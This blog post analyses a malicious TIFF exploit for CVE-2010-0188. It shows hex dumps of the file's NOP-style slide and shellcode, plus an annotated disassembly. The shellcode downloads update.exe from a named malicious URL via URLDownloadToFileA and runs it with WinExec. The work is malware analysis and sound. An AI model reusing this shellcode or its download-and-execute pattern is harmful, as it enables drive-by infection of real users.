000001F0  D0 EB 2D E8 63 FF FF FF BA AA 6E 8A F3 52 50 E8   ..-.c.....n..RP.
00000200  7A FF FF FF 31 D2 83 C2 FF 83 EA FA 52 53 FF D0   z...1.......RS..
00000210  EB C9 BA 47 7D C8 A0 52 50 E8 60 FF FF FF EB AE   ...G}..RP.`.....
00000220  EB 5D E8 34 FF FF FF BA 12 CE 1A 09 52 50 E8 4B   .].4........RP.K
00000230  FF FF FF 56 FF D0 EB DA E8 F9 FE FF FF 75 72 6C   ...V.........url
00000240  6D 6F 6E 2E 64 6C 6C FF 2E 2E 2F 75 70 64 61 74   mon.dll.../updat
00000250  65 2E 65 78 65 FF 68 74 74 70 3A 2F 2F 76 69 63   e.exe.http://vic
00000260  74 6F 72 6E 69 67 6C 69 6F 2E 69 6E 66 6F 2F 34   torniglio.info/4
00000270  33 68 62 74 72 2F 64 6F 77 6E 6C 6F 61 64 5F 66   3hbtr/download_f
00000280  69 6C 65 2E 70 68 70 3F 65 3D 41 64 6F 62 65 2D   ile.php?e=Adobe-
00000290  39 30 2D 32 30 31 30 2D 30 31 38 38 FF CD 03 3E   90-2010-0188...>
000002A0  3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E   >>>>>>>>>>>>>>>>
000002B0  3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E 3E   >>>>>>>>>>>>>>>>
more brackets...
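The first eight bytes of the dump are a regular TIFF header, which is easy to confirm with a small Python sketch. The layout used here (byte-order mark, the magic number 42, offset of the first IFD) is the standard TIFF file header; the function name is hypothetical.

```python
import struct


def parse_tiff_header(data):
    """Return the struct endianness prefix and the offset of the first IFD."""
    order = data[:2]
    if order == b"MM":
        endian = ">"   # big endian ("Motorola")
    elif order == b"II":
        endian = "<"   # little endian ("Intel")
    else:
        raise ValueError("not a TIFF byte-order mark")
    magic, ifd_offset = struct.unpack_from(endian + "HI", data, 2)
    if magic != 42:
        raise ValueError("bad TIFF magic number")
    return endian, ifd_offset


# The first 8 bytes from the dump above.
endian, ifd_offset = parse_tiff_header(bytes.fromhex("4D4D002A00002038"))
print(endian, hex(ifd_offset))  # > 0x2038
```

So this is a big-endian TIFF whose first IFD sits at 0x2038, well past the slide, the shellcode and the run of brackets.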

The repetition of the 0x0C 0x90 sequence is easily identifiable as a slide for the shellcode that follows:

00001000: or al, 0x90
00001002: or al, 0x90
00001004: or al, 0x90
00001006: or al, 0x90
; etc.

Thus, the space after the slide is the start of the actual shellcode. Let’s disassemble it with the Profiler:
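Finding where the slide ends is a matter of skipping the repeated pattern. Here is a minimal Python sketch, assuming the slide starts right after the 8-byte TIFF header as in the dump; `slide_end` is a hypothetical helper and the sample buffer is rebuilt from the dump rather than read from the real file.

```python
def slide_end(data, start=8, pattern=b"\x0c\x90"):
    """Return the offset of the first byte after the repeated pattern."""
    pos = start
    while data[pos:pos + len(pattern)] == pattern:
        pos += len(pattern)
    return pos


# TIFF header, 150 repetitions of 0C 90, then the first shellcode bytes.
sample = bytes.fromhex("4D4D002A00002038") + b"\x0c\x90" * 150 + b"\xeb\x46"
print(hex(slide_end(sample)))  # 0x134
```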

In order to quickly analyze the shellcode we can debug it. We select the portion from 0x134 to 0x29E, press Ctrl+R and run the action ‘Shellcode to executable‘. If you don’t have this action, update your copy of the Profiler.

It creates a Portable Executable out of the bytes selected in the hex view, so that we can easily debug them with any debugger.

Optionally we can specify an application to automatically open the generated file. In this case, as you can see, I have selected OllyDbg.

Here’s the analysis of the shellcode:

00001000: jmp 0x1048
00001002: pop edi ; edi = start of strings
00001003: xor ecx, ecx
00001005: sub ecx, 0x1 ; ecx = 0xFFFFFFFF
00001008: mov esi, edi ; esi = 0x1108
0000100A: xor al, al
0000100C: sub al, 0x1 ; al = 0xFF
0000100E: repne scasb byte ptr [edi] ; find 0xFF terminator
00001010: inc byte ptr [edi-0x1] ; set to 0
00001013: mov ebx, edi ; repeats for the second string
00001015: xor al, al
00001017: sub al, 0x1
00001019: repne scasb byte ptr [edi]
0000101B: inc byte ptr [edi-0x1]
0000101E: mov ebp, edi ; repeats for the third string
00001020: repne scasb byte ptr [edi]
00001022: inc byte ptr [edi-0x1]
; now the three strings 'urlmon.dll', '../update.exe' and
; 'http://victorniglio.info/43hbtr/download_file.php?e=Adobe-90-2010-0188'
; are 0 terminated
00001025: jmp 0x1098
00001027: pushad ; retrieves the base of kernel32.dll
00001028: xor ecx, ecx
0000102A: mov esi, dword ptr fs:[ecx+0x30]
0000102E: mov esi, dword ptr [esi+0xc]
00001031: mov esi, dword ptr [esi+0x1c]
00001034: mov ebx, dword ptr [esi+0x8]
00001037: mov edx, dword ptr [esi+0x20]
0000103A: mov esi, dword ptr [esi]
0000103C: cmp word ptr [edx+0x18], cx
00001040: jnz 0x1034
00001042: mov dword ptr [esp+0x1c], ebx ; ebx = kernel32.dll base
00001046: popad
00001047: ret
00001048: jmp 0x10a5
0000104A: pushad ; this function retrieves the address of an API
0000104B: mov ebp, dword ptr [esp+0x24]
0000104F: mov eax, dword ptr [ebp+0x3c]
00001052: mov edx, dword ptr [ebp+eax*1+0x78]
00001056: add edx, ebp
00001058: mov ecx, dword ptr [edx+0x18]
0000105B: mov ebx, dword ptr [edx+0x20]
0000105E: add ebx, ebp
00001060: jecxz 0x1096
00001062: dec ecx
00001063: mov esi, dword ptr [ebx+ecx*4]
00001066: add esi, ebp
00001068: xor edi, edi
0000106A: xor eax, eax
0000106C: cld
0000106D: lodsb byte ptr [esi]
0000106E: test al, al
00001070: jz 0x1079
00001072: ror edi, 0x12
00001075: add edi, eax
00001077: jmp 0x106d
00001079: cmp edi, dword ptr [esp+0x28]
0000107D: jnz 0x1060
0000107F: mov ebx, dword ptr [edx+0x24]
00001082: add ebx, ebp
00001084: mov cx, word ptr [ebx+ecx*2]
00001088: mov ebx, dword ptr [edx+0x1c]
0000108B: add ebx, ebp
0000108D: mov eax, dword ptr [ebx+ecx*4]
00001090: add eax, ebp
00001092: mov dword ptr [esp+0x1c], eax ; eax = API address
00001096: popad
00001097: ret
00001098: jmp 0x10ee
0000109A: xor edx, edx
0000109C: push edx ; lpfnCB
0000109D: push edx ; dwReserved
0000109E: push ebx ; szFileName = ../update.exe
0000109F: push ebp ; szURL = http://victorniglio.info/43hbtr/download_file.php?e=Adobe-90-2010-0188
000010A0: push edx ; pCaller
000010A1: call eax ; URLDownloadToFileA
000010A3: jmp 0x10bf
000010A5: jmp 0x1104
000010A7: call 0x1027 ; after the call eax = kernel32.dll base
000010AC: mov edx, 0xc48bbae7
000010B1: push edx
000010B2: push eax
000010B3: call 0x104a ; retrieve address of ExitProcess
000010B8: xor edx, edx
000010BA: push edx
000010BB: call eax ; ExitProcess
000010BD: jmp 0x10ec
000010BF: call 0x1027 ; after the call eax = kernel32.dll base
000010C4: mov edx, 0xf38a6eaa
000010C9: push edx
000010CA: push eax
000010CB: call 0x104a ; retrieve address of WinExec
000010D0: xor edx, edx
000010D2: add edx, 0xffffffff
000010D5: sub edx, 0xfffffffa
000010D8: push edx ; uCmdShow = 5
000010D9: push ebx ; lpCmdLine = ../update.exe
000010DA: call eax ; WinExec
000010DC: jmp 0x10a7
000010DE: mov edx, 0xa0c87d47
000010E3: push edx
000010E4: push eax
000010E5: call 0x104a ; retrieve address of URLDownloadToFileA
000010EA: jmp 0x109a
000010EC: jmp 0x114b ; jumps to int 3
000010EE: call 0x1027 ; after the call eax = kernel32.dll base
000010F3: mov edx, 0x91ace12
000010F8: push edx
000010F9: push eax
000010FA: call 0x104a ; retrieve address of LoadLibraryA
000010FF: push esi ; "urlmon.dll"
00001100: call eax ; LoadLibraryA
00001102: jmp 0x10de
00001104: call 0x1002

Very standard code as you can see. It downloads a file with URLDownloadToFileA, executes it with WinExec and quits.
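The only slightly unusual part is the string fix-up at the beginning: the strings are stored with 0xFF terminators, presumably to keep null bytes out of the payload, and are turned into C strings at run time. Here is a minimal Python sketch of that step, using the string data from the hex dump; `terminate_strings` is a hypothetical helper.

```python
# String area of the shellcode, as it appears in the hex dump.
BLOB = (
    b"urlmon.dll\xff"
    b"../update.exe\xff"
    b"http://victorniglio.info/43hbtr/download_file.php?e=Adobe-90-2010-0188\xff"
)


def terminate_strings(buf, start=0, count=3):
    """Replace the 0xFF terminators with 0 and collect the strings."""
    out = bytearray(buf)
    strings = []
    pos = start
    for _ in range(count):
        end = out.index(0xFF, pos)          # repne scasb with al = 0xFF
        out[end] = (out[end] + 1) & 0xFF    # inc byte ptr [edi-1]: 0xFF -> 0
        strings.append(out[pos:end].decode("ascii"))
        pos = end + 1
    return bytes(out), strings


patched, strings = terminate_strings(BLOB)
print(strings)
```

The three collected strings correspond to the values held in esi, ebx and ebp in the listing.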

The next time I’ll try to pick out something more recent.
Author: Erik Pistelli. Posted on May 21, 2013 (updated April 1, 2021). Categories: Suite Standard. Tags: CVE-2010-0188, Overflow, Shellcode.
